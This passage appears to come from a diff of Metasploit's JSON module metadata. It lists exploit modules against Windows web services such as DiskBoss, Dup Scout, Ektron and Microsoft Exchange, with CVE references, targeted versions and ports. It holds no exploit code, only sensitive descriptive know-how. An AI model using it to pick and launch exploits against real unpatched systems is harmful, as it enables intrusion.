This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "EDB-40869", + "EDB-42395" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "DiskBoss Enterprise v7.4.28", + "DiskBoss Enterprise v7.5.12", + "DiskBoss Enterprise v8.2.14" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/diskboss_get_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/diskboss_get_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/disksavvy_get_bof": { + "name": "DiskSavvy Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/disksavvy_get_bof", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-12-01", + "type": "exploit", + "author": [ + "vportal", + "Gabor Seljan" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. 
This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2017-6187", + "EDB-40869" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "DiskSavvy Enterprise v9.1.14", + "DiskSavvy Enterprise v9.3.14" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/disksavvy_get_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/disksavvy_get_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/disksorter_bof": { + "name": "Disk Sorter Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/disksorter_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-03-15", + "type": "exploit", + "author": [ + "Daniel Teixeira" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Disk Sorter Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. 
This module has been tested\n successfully on Windows 7 SP1 x86.", + "references": [ + "CVE-2017-7230" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Disk Sorter Enterprise v9.5.12" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/disksorter_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/disksorter_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/dlink_central_wifimanager_rce": { + "name": "D-Link Central WiFi Manager CWM(100) RCE", + "fullname": "exploit/windows/http/dlink_central_wifimanager_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-07-09", + "type": "exploit", + "author": [ + "M3 ", + "Redouane NIBOUCHA " + ], + "description": "This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100)\n versions below `v1.03R0100_BETA6`. 
The vulnerability exists in the\n username cookie, which is passed to `eval()` without being sanitized.\n Dangerous functions are not disabled by default, which makes it possible\n to get code execution on the target.", + "references": [ + "CVE-2019-13372", + "URL-https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/" + ], + "platform": "PHP", + "arch": "php", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/dlink_central_wifimanager_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/dnn_cookie_deserialization_rce": { + "name": "DotNetNuke Cookie Deserialization Remote Code Excecution", + "fullname": "exploit/windows/http/dnn_cookie_deserialization_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-07-20", + "type": "exploit", + "author": [ + "Jon Park", + "Jon Seigel" + ], + "description": "This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC.\n Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.\n The expected structure includes a \"type\" attribute to instruct the server which type of object to create on deserialization.\n The cookie is processed by the application whenever it attempts to load the current user's profile data.\n This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration).\n An attacker can leverage this 
vulnerability to execute arbitrary code on the system.", + "references": [ + "CVE-2017-9822", + "CVE-2018-15811", + "CVE-2018-15812", + "CVE-2018-18325", + "CVE-2018-18326", + "URL-https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf", + "URL-https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html", + "URL-https://github.com/pwntester/ysoserial.net" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "v5.0 - v9.0.0", + "v9.0.1 - v9.1.1", + "v9.2.0 - v9.2.1", + "v9.2.2 - v9.3.0-RC" + ], + "mod_time": "2024-06-18 09:23:41 +0000", + "path": "/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/dnn_cookie_deserialization_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/dup_scout_enterprise_login_bof": { + "name": "Dup Scout Enterprise Login Buffer Overflow", + "fullname": "exploit/windows/http/dup_scout_enterprise_login_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-11-14", + "type": "exploit", + "author": [ + "sickness", + "Chris Higgins", + "bcoles " + ], + "description": "This module exploits a stack buffer overflow in Dup Scout Enterprise\n versions <= 10.0.18. The buffer overflow exists via the web interface\n during login. 
This gives NT AUTHORITY\\SYSTEM access.\n\n This module has been tested successfully on Dup Scout Enterprise\n versions:\n\n 9.9.14 on Windows 7 SP1 (x64);\n 9.9.14 on Windows XP SP0 (x64);\n 10.0.18 on Windows 7 SP1 (x64);\n 10.0.18 on Windows XP SP0 (x86); and\n 10.0.18 on Windows 10 (1909) (x64).", + "references": [ + "CVE-2017-13696", + "CWE-121", + "EDB-42557", + "EDB-43145", + "EDB-40832" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Dup Scout Enterprise 9.9.14 (x86)", + "Dup Scout Enterprise 10.0.18 (x86)" + ], + "mod_time": "2021-02-25 17:14:25 +0000", + "path": "/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/dup_scout_enterprise_login_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/dupscts_bof": { + "name": "Dup Scout Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/dupscts_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-03-15", + "type": "exploit", + "author": [ + "vportal", + "Daniel Teixeira", + "bcoles " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Dup Scout Enterprise versions <= 10.0.18,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server which can be leveraged\n to execute arbitrary code in the context of NT AUTHORITY\\SYSTEM.\n\n This module supports x86 versions of Dup Scout Enterprise and x86\n Windows operating systems only and has been tested successfully on\n 
Windows 7 SP1 (x86) and Windows XP SP0 (x86).", + "references": [ + "CVE-2017-13696", + "CWE-121", + "EDB-42557", + "EDB-49217" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Dup Scout Enterprise v8.3.16 (x86)", + "Dup Scout Enterprise v8.4.16 (x86)", + "Dup Scout Enterprise v9.0.28 (x86)", + "Dup Scout Enterprise v9.1.14 (x86)", + "Dup Scout Enterprise v9.5.14 (x86)", + "Dup Scout Enterprise v9.9.14 (x86)", + "Dup Scout Enterprise v10.0.18 (x86)" + ], + "mod_time": "2021-02-25 17:12:27 +0000", + "path": "/modules/exploits/windows/http/dupscts_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/dupscts_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/easychatserver_seh": { + "name": "Easy Chat Server User Registeration Buffer Overflow (SEH)", + "fullname": "exploit/windows/http/easychatserver_seh", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-10-09", + "type": "exploit", + "author": [ + "Marco Rivoli", + "Aitezaz Mohsin" + ], + "description": "This module exploits a buffer overflow during user registration in Easy Chat Server software.", + "references": [ + "EDB-42155" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Easy Chat Server 2.0 to 3.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/easychatserver_seh.rb", + "is_install_path": true, + "ref_name": 
"windows/http/easychatserver_seh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/easyfilesharing_post": { + "name": "Easy File Sharing HTTP Server 7.2 POST Buffer Overflow", + "fullname": "exploit/windows/http/easyfilesharing_post", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-06-12", + "type": "exploit", + "author": [ + "bl4ck h4ck3r", + "Marco Rivoli " + ], + "description": "This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.", + "references": [ + "EDB-42186" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Easy File Sharing 7.2 HTTP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/easyfilesharing_post.rb", + "is_install_path": true, + "ref_name": "windows/http/easyfilesharing_post", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/easyfilesharing_seh": { + "name": "Easy File Sharing HTTP Server 7.2 SEH Overflow", + "fullname": "exploit/windows/http/easyfilesharing_seh", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-12-02", + "type": "exploit", + "author": [ + "Starwarsfan2099 " + ], + "description": "This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.", + "references": [ + "EDB-39008" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Easy File Sharing 7.2 HTTP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/easyfilesharing_seh.rb", + "is_install_path": true, + "ref_name": "windows/http/easyfilesharing_seh", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/easyftp_list": { + "name": "EasyFTP Server list.html path Stack Buffer Overflow", + "fullname": "exploit/windows/http/easyftp_list", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-02-18", + "type": "exploit", + "author": [ + "ThE g0bL!N", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing the 'path' parameter\n supplied to an HTTP GET request, which leads to a stack based buffer overflow.\n EasyFTP allows anonymous access by default; valid credentials are typically\n unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n Due to limited space, as well as difficulties using an egghunter, the use of\n staged, ORD, and/or shell payloads is recommended.", + "references": [ + "OSVDB-66614", + "EDB-11500" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP3 - Easy FTP Server Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/easyftp_list.rb", + "is_install_path": true, + "ref_name": "windows/http/easyftp_list", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/edirectory_host": { + "name": "Novell eDirectory NDS Server Host Header Overflow", + "fullname": "exploit/windows/http/edirectory_host", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-10-21", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.\n The web interface does not validate the length 
of the\n HTTP Host header prior to using the value of that header in an\n HTTP redirect.", + "references": [ + "CVE-2006-5478", + "OSVDB-29993", + "BID-20655" + ], + "platform": "Windows", + "arch": "", + "rport": 8028, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Novell eDirectory 8.8.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/edirectory_host.rb", + "is_install_path": true, + "ref_name": "windows/http/edirectory_host", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/edirectory_imonitor": { + "name": "eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow", + "fullname": "exploit/windows/http/edirectory_imonitor", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-08-11", + "type": "exploit", + "author": [ + "Unknown", + "Matt Olney " + ], + "description": "This module exploits a stack buffer overflow in eDirectory 8.7.3\n iMonitor service. This vulnerability was discovered by Peter\n Winter-Smith of NGSSoftware.\n\n NOTE: repeated exploitation attempts may cause eDirectory to crash. 
It does\n not restart automatically in a default installation.", + "references": [ + "CVE-2005-2551", + "OSVDB-18703", + "BID-14548" + ], + "platform": "Windows", + "arch": "", + "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows (ALL) - eDirectory 8.7.3 iMonitor" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/edirectory_imonitor.rb", + "is_install_path": true, + "ref_name": "windows/http/edirectory_imonitor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/efs_easychatserver_username": { + "name": "EFS Easy Chat Server Authentication Request Handling Buffer Overflow", + "fullname": "exploit/windows/http/efs_easychatserver_username", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-08-14", + "type": "exploit", + "author": [ + "LSO ", + "bcoles " + ], + "description": "This module exploits a stack buffer overflow in EFS Software Easy Chat\n Server versions 2.0 to 3.1. 
By sending an overly long authentication\n request, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2004-2466", + "OSVDB-7416", + "OSVDB-106841", + "BID-25328" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "Easy Chat Server 2.0", + "Easy Chat Server 2.1 - 3.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/efs_easychatserver_username.rb", + "is_install_path": true, + "ref_name": "windows/http/efs_easychatserver_username", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/efs_fmws_userid_bof": { + "name": "Easy File Management Web Server Stack Buffer Overflow", + "fullname": "exploit/windows/http/efs_fmws_userid_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-05-20", + "type": "exploit", + "author": [ + "superkojiman", + "Julien Ahrens", + "TecR0c " + ], + "description": "Easy File Management Web Server v4.0 and v5.3 contains a stack buffer\n overflow condition that is triggered as user-supplied input is not\n properly validated when handling the UserID cookie. 
This may allow a\n remote attacker to execute arbitrary code.", + "references": [ + "CVE-2014-3791", + "OSVDB-107241", + "EDB-33610", + "BID-67542", + "URL-http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536", + "URL-http://www.web-file-management.com/" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "Efmws 5.3 Universal", + "Efmws 4.0 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/efs_fmws_userid_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/efs_fmws_userid_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ektron_xslt_exec": { + "name": "Ektron 8.02 XSLT Transform Remote Code Execution", + "fullname": "exploit/windows/http/ektron_xslt_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-10-16", + "type": "exploit", + "author": [ + "Rich Lundeen", + "juan vazquez ", + "Nicolas \"Nicob\" Gregoire" + ], + "description": "This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The\n vulnerability exists due to the insecure usage of XslCompiledTransform, using a\n XSLT controlled by the user. 
The module has been tested successfully on Ektron CMS\n 8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK\n SERVICE privileges.", + "references": [ + "CVE-2012-5357", + "OSVDB-88107", + "URL-http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/", + "URL-http://technet.microsoft.com/en-us/security/msvr/msvr12-016" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2003 SP2 / Ektron CMS400 8.02" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/http/ektron_xslt_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/ektron_xslt_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ektron_xslt_exec_ws": { + "name": "Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution", + "fullname": "exploit/windows/http/ektron_xslt_exec_ws", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-02-05", + "type": "exploit", + "author": [ + "catatonicprime" + ], + "description": "Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have\nvulnerabilities in various operations within the ServerControlWS.asmx\nweb services. 
These vulnerabilities allow for RCE without authentication and\nexecute in the context of IIS on the remote system.", + "references": [ + "CVE-2015-0923", + "US-CERT-VU-377644", + "URL-http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2008 R2 / Ektron CMS400 8.5" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ektron_xslt_exec_ws.rb", + "is_install_path": true, + "ref_name": "windows/http/ektron_xslt_exec_ws", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ericom_access_now_bof": { + "name": "Ericom AccessNow Server Buffer Overflow", + "fullname": "exploit/windows/http/ericom_access_now_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-06-02", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a stack based buffer overflow in Ericom AccessNow Server. The\n vulnerability is due to an insecure usage of vsprintf with user controlled data,\n which can be triggered with a malformed HTTP request. 
This module has been tested\n successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003\n Server SP2.", + "references": [ + "ZDI-14-160", + "CVE-2014-3913", + "BID-67777", + "URL-http://www.ericom.com/security-ERM-2014-610.asp" + ], + "platform": "Windows", + "arch": "x86", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ericom_access_now_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/ericom_access_now_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/exchange_chainedserializationbinder_rce": { + "name": "Microsoft Exchange Server ChainedSerializationBinder RCE", + "fullname": "exploit/windows/http/exchange_chainedserializationbinder_rce", + "aliases": [ + "exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce" + ], + "rank": 600, + "disclosure_date": "2021-12-09", + "type": "exploit", + "author": [ + "pwnforsp", + "zcgonvh", + "Microsoft Threat Intelligence Center", + "Microsoft Security Response Center", + "peterjson", + "testanull", + "Grant Willcox", + "Spencer McIntyre", + "Markus Wulftange" + ], + "description": "This module exploits vulnerabilities within the ChainedSerializationBinder as used in\n Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and\n Exchange Server 2016 CU22 all prior to Mar22SU.\n\n Note that authentication is required to exploit these vulnerabilities.", + "references": [ + "CVE-2021-42321", + "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321", + 
"URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7", + "URL-https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169", + "URL-https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398", + "URL-https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852", + "CVE-2022-23277", + "URL-https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html", + "URL-https://testbnull.medium.com/note-nhanh-v%E1%BB%81-binaryformatter-binder-v%C3%A0-cve-2022-23277-6510d469604c" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2022-08-17 17:36:31 +0000", + "path": "/modules/exploits/windows/http/exchange_chainedserializationbinder_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/exchange_chainedserializationbinder_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/exchange_ecp_dlp_policy": { + "name": "Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE", + "fullname": "exploit/windows/http/exchange_ecp_dlp_policy", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-01-12", + "type": "exploit", + "author": [ + "Leonard Rapp", + "Markus Vervier", + "Steven Seeley", + "Yasar Klawohn", + "wvu ", + "Spencer McIntyre" + ], + "description": 
"This vulnerability allows remote attackers to execute arbitrary code\n on affected installations of Exchange Server. Authentication is\n required to exploit this vulnerability. Additionally, the target user\n must have the \"Data Loss Prevention\" role assigned and an active\n mailbox.\n\n If the user is in the \"Compliance Management\" or greater \"Organization\n Management\" role groups, then they have the \"Data Loss Prevention\"\n role. Since the user who installed Exchange is in the \"Organization\n Management\" role group, they transitively have the \"Data Loss\n Prevention\" role.\n\n The specific flaw exists within the processing of the New-DlpPolicy\n cmdlet. The issue results from the lack of proper validation of\n user-supplied template data when creating a DLP policy. An attacker\n can leverage this vulnerability to execute code in the context of\n SYSTEM.\n\n Tested against Exchange Server 2016 CU19 on Windows Server 2016.", + "references": [ + "CVE-2020-16875", + "CVE-2020-17132", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875", + "URL-https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016", + "URL-https://srcincite.io/advisories/src-2020-0019/", + "URL-https://srcincite.io/pocs/cve-2020-16875.py.txt", + "URL-https://srcincite.io/pocs/cve-2020-16875.ps1.txt", + "URL-https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html", + "URL-https://www.x41-dsec.de/security/advisory/exploit/research/2020/12/21/x41-microsoft-exchange-rce-dlp-bypass/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Exchange Server <= 2016 CU19 and 2019 CU8" + ], + "mod_time": "2021-04-29 21:26:02 +0000", + "path": "/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb", + 
"is_install_path": true, + "ref_name": "windows/http/exchange_ecp_dlp_policy", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "account-lockouts", + "config-changes", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/exchange_ecp_viewstate": { + "name": "Exchange Control Panel ViewState Deserialization", + "fullname": "exploit/windows/http/exchange_ecp_viewstate", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-02-11", + "type": "exploit", + "author": [ + "Spencer McIntyre" + ], + "description": "This module exploits a .NET serialization vulnerability in the\n Exchange Control Panel (ECP) web page. The vulnerability is due to\n Microsoft Exchange Server not randomizing the keys on a\n per-installation basis resulting in them using the same validationKey\n and decryptionKey values. 
With knowledge of these values, an attacker\n can craft a special ViewState to cause an OS command to be executed\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.", + "references": [ + "CVE-2020-0688", + "URL-https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows (x86)", + "Windows (x64)", + "Windows (cmd)" + ], + "mod_time": "2020-08-21 10:13:45 +0000", + "path": "/modules/exploits/windows/http/exchange_ecp_viewstate.rb", + "is_install_path": true, + "ref_name": "windows/http/exchange_ecp_viewstate", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/exchange_proxylogon_rce": { + "name": "Microsoft Exchange ProxyLogon RCE", + "fullname": "exploit/windows/http/exchange_proxylogon_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-03-02", + "type": "exploit", + "author": [ + "Orange Tsai", + "Jang ( ", + "mekhalleh (RAMELLA Sébastien)", + "print(\"\")", + "lotusdll", + "Praetorian" + ], + "description": "This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication, impersonating as the\n admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange 